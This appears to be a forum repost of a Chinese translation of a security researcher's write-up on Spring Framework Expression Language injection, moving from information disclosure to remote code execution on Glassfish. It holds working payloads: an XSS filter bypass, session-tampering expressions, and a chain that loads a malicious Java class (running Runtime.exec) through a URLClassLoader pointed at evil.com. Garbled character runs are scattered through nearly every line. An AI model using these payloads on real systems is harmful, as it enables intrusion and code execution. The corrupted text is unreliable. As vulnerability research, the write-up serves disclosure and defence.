Remote Code with
0 {. I! F [0 tExpression Language Injection% _5 X# M7 h7 B5 v8 B+ r
Spring Framework脆弱性—DanAmodio
* o2 J3 X# y$ A$ p% |" J; I全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中# l6 w) l, f7 M1 I- g( d) m: D
可能会存在风险。
1 l4 X; h1 d5 x6 U在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
( B n' a$ B) YArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可/ [/ L& y# c8 s: H! d
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
2 R: D7 A' t" x, i U Q! R以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
! i2 L9 M% {, P# ^- |版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。. h6 b9 p3 ?+ i4 V. m& p( A
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但: m2 b5 \. J5 T/ h/ M* X2 ^
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版5 Z8 N% D4 v0 O$ R, W, d
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
1 `$ X" \: Q" m- _$ |& h# m这些版本不支持禁用double EL resolution.: S" I+ q7 ^( G6 [6 n7 c k3 ~
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
. Y8 q1 Y7 _, K" s/ gEL2.2容器上可能进行远程代码执行。. ]# J& |7 `9 j7 ]
这是一个原始信息泄露的攻击例子:9 ^2 @3 ^+ |, N6 H
请求:
) i7 ]$ F) s! S5 Y* Ittp://vulnerable.com/foo?message=${applicationScope}8 a* a0 l5 W. U8 f7 g
到达以下内容页面:6 {& N- u6 C. K0 D
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
8 A8 F7 K6 e! ]: T% R( @你也可以做一些其他事情,如这样:1 V; x2 l* r8 ]9 L1 {
${9999+1}
8 c/ ^' z; L8 ]6 z4 K" Y c还可以访问session 对象和beans2 ^, |8 A* D [6 i) @+ Y. ]% Y
${employee.lastName}8 }3 T0 N. o8 H* D" Y: D
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是& ~3 p( e6 M+ p+ K9 P; [) c5 T
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
5 k8 j! }7 \( {西,比如XSS.
' w3 z2 x9 A! Q! z哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签: E) d8 o/ O4 }# }
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
1 ^- P6 {: u p6 p% C呢?”" H& P9 V* D7 N3 L3 a! f) g( M0 X* \
因此,我尝试巳缦拢�) l, p2 T3 U0 N# p( P' y
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP/ E+ P/ u" Q9 A# Z) N4 g4 K0 O: J
P
1 h! P$ R. }4 l, \1 K ~0 d; A我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返' f% h: P6 O- q+ c2 ]% V; i& X
回的文本被插入进了spring:message 标签。
" \; ]5 E9 `- H2 V这里是一个最终绕过过滤的实例:. \! a# x4 N8 Q0 c' n# e
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ8 w$ {; R1 @& S; ?
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
0 ~; R! ]% [% h- x" E* X# \+ j1 d什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?, j6 |" U: L* }. t& U& b/ o
经过一番研究,我学习到EL2.2 增加了方法调用。
- [4 q4 }# I9 n; T# q9 A我写了一个快速测试应用程序代码并且检测一些功能
, p! z$ h, K& i6 _+ P${pageContext.request.getSession().setAttribute(“account”,”123456″)}2 v) ?6 Z0 \% \: [8 J% D8 t2 I7 _) u ~
${pageContext.request.getSession().setAttribute(“admin”,true)}
0 G: J+ E4 U0 @# E: N& g0 ?3 j好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的" o8 V# z7 X7 \. {) v; Q6 O
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?# b1 L1 l# z( S! |; ~' x {. j+ d
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
( T9 a# K0 ^6 Q8 X1 T5 k; M“, 1234)}
) _" p, a8 b0 g$ a${“”.getClass().forName(“java.lang.Runtime”)}
* ?/ N2 r. p; B- ?8 X+ f( l$ _哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不- O/ ~3 H9 N# {5 X8 U
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
( @' _- X+ P( }5 R1 v4 k! p5 ~3 P数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
; ~9 L8 b4 K _, m( g( T一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于% v9 i5 n" d0 u5 h9 m d
方法签名invoke(Object obj, Object„ args)
3 h( w. f% k3 U/ T2 t: C/ YJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问( [) j0 ~6 @+ t6 H$ k3 H
题,以让它可以工作起来。. \* T, Y0 A) r8 J- A q0 e- H4 Y
漏洞利用:( h% H6 ^ b& x+ m8 l4 d5 d
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我 G3 q6 Z7 J! P! W0 \
希望你们中的一些JAVA奇才告诉我我是如此的可笑。, N. ^1 }+ _! M0 ?# u
这里有一些我试过的失败的用例,为了试图让它工作的用例:
; p% ^, ^& b1 @5 K* C! ]3 w 写文件到文件系统# Y' ?+ y$ G2 Q" h/ n
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
# V! L5 J. d* {7 r/ m我认为这些可以很好的工作,但是我不能找到合适的类来载入。
0 x" {; c% U0 u${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}! K6 r* P- J* X( F$ Y
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:- M& X6 L5 {8 y7 K T
org.springframework.expression.spel.standard.SpelExpressionParser not found
% ~$ ~, Y! @" R! U3 oby
: |. P- \ q5 i6 K3 borg.glassfish.web.javax.servlet.jsp [194].
9 ^% R# ^! ~1 l8 j# o* J* z 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
; J7 N, \' m' V% e; K" z5 e 利用反射来创建一个新的Runtime(and watch the world burn)
2 [ t' J5 W4 ?( {${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
0 d" _* ]/ J$ r1 L(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
9 r5 ~/ U# o& K5 Y5 y& {+ I1 D% _${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
$ @- X! b2 l* B( t 使用java.lang.ProcessBuilder
3 _2 g/ W( w; x: `- K' b$ \ 用表达式语言来评估表达式语言
7 E k. R5 Z, m5 F' @Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.; a) {* R7 X1 h: S
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request2 E4 S# \2 o: B+ u% O1 I5 M
“,”".getClass(),null)}, U4 i7 B* f- m8 S/ m0 V2 a, u
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
6 u8 G2 Q: U1 r我在使用一个空数组通过Method.invoke()时失败了很多次0 N, v; B* K* _
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
: B$ c1 a% E2 \/ K9 j" J.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
: v: }$ }+ ?1 JrrayList”).newInstance().toArray())
^: S# G/ U3 A" k) Yjava.lang.IllegalArgumentException: wrong number of arguments
! u! O/ H N0 C0 {5 w' }5 A' V最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可# ?* ]+ `0 ~9 K
以创建一个恶意class文件并且指向类装载器.4 m5 G: y4 @ r: W! F. c! `
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
. e' I! i: S) @- Y/ Ppublic class Malicious {
6 I3 ^/ J" h$ C9 G, R" Ppublic Malicious() {2 e7 d4 e. k3 u7 v. _3 r. I7 v
try {6 u5 l$ z0 m/ A4 k& {% K9 ~. | A
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
$ H" K) e5 P* x& @! ^java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
0 |# d6 H7 l5 ?( z6 A6 ]7 n} catch (Exception e) {
" y6 @& [+ c, G2 ], N}
+ \" n; `( u2 ]2 r% I}
% T- f* ^! N) ~$ ]我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
, w4 N* D! k/ u2 U @话中,因此它可以被使用.3 B5 ?' n0 l$ P- J, P: s. H
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
$ W0 T* c. y. u) d(“java.util.ArrayList”).newInstance())}
n, _* q3 r0 k* g uURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
5 Z0 _' c2 m+ H! `& L一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和0 O% s6 b( T [
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个3 B v( d8 q& C ]+ g( @
我们可以调用的create(string)方法,然后转换对一个URL对象。
2 T" c: f) t" d2 |${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
1 o) [4 B- q! nere/malicious/classfile/is/located/”).toURL())}
8 ]+ J$ F0 z0 m" \. e% i然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
9 }! _. \& Z. ^: J/ Q; P. t' ^3 q# b% l恶意类文件被装载并创建,触发远程代码.
* e& \5 w* M+ c- Q${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte' b5 J1 |6 C$ g% W& ~
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
) _) Z8 l4 w7 a5 Z+ mgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
" Y, x M. }/ D) z" ~- s()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对